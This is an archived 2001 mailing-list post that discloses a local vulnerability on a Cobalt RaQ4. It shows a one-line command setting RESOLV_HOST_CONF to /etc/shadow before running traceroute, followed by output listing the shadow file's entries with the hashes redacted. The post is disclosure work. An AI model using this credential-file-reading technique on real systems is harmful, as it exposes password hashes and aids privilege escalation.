[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] local root exploit with glibc2.2 update from cobalt
- Subject: [cobalt-security] local root exploit with glibc2.2 update from cobalt
- From: Linking Internet - Peter Batenburg <peter@xxxxxxxxxx>
- Date: Thu, 11 Jan 2001 20:50:36 +0100
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
On a RaQ4 with all the latest patches apply'ed. Including the glibc update
i get this:
[root /home]# export RESOLV_HOST_CONF=/etc/shadow && /usr/sbin/traceroute
localhost
/etc/shadow: line 1: bad command `root:<my-password>:11325:0:99999:7:::'
/etc/shadow: line 2: bad command `bin:*:11260:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:*:11260:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:*:11260:0:99999:7:::'
/etc/shadow: line 5: bad command `lp:*:11260:0:99999:7:::'
/etc/shadow: line 6: bad command `sync:*:11260:0:99999:7:::'
/etc/shadow: line 7: bad command `shutdown:*:11260:0:99999:7:::'
/etc/shadow: line 8: bad command `halt:*:11260:0:99999:7:::'
/etc/shadow: line 9: bad command `mail:*:11260:0:99999:7:::'
/etc/shadow: line 10: bad command `news:*:11260:0:99999:7:::'
/etc/shadow: line 11: bad command `uucp:*:11260:0:99999:7:::'
/etc/shadow: line 12: bad command `httpd:*:11260:0:99999:7:::'
/etc/shadow: line 13: bad command `nobody:*:11260:0:99999:7:::'
/etc/shadow: line 14: bad command `pop:!!:11260:0:99999:7:::'
/etc/shadow: line 15: bad command `postgres:!!:11260:0:99999:7:::'
/etc/shadow: line 16: bad command `chiliasp:!!:11260:0:99999:7:::'
/etc/shadow: line 17: bad command `admin:<my-password>:11325:0:99999:7:::'
traceroute to localhost (127.0.0.1), 30 hops max, 38 byte packets
1 localhost (127.0.0.1) 0.160 ms 0.094 ms 0.073 ms
I wonder what cobalt is going to do about it....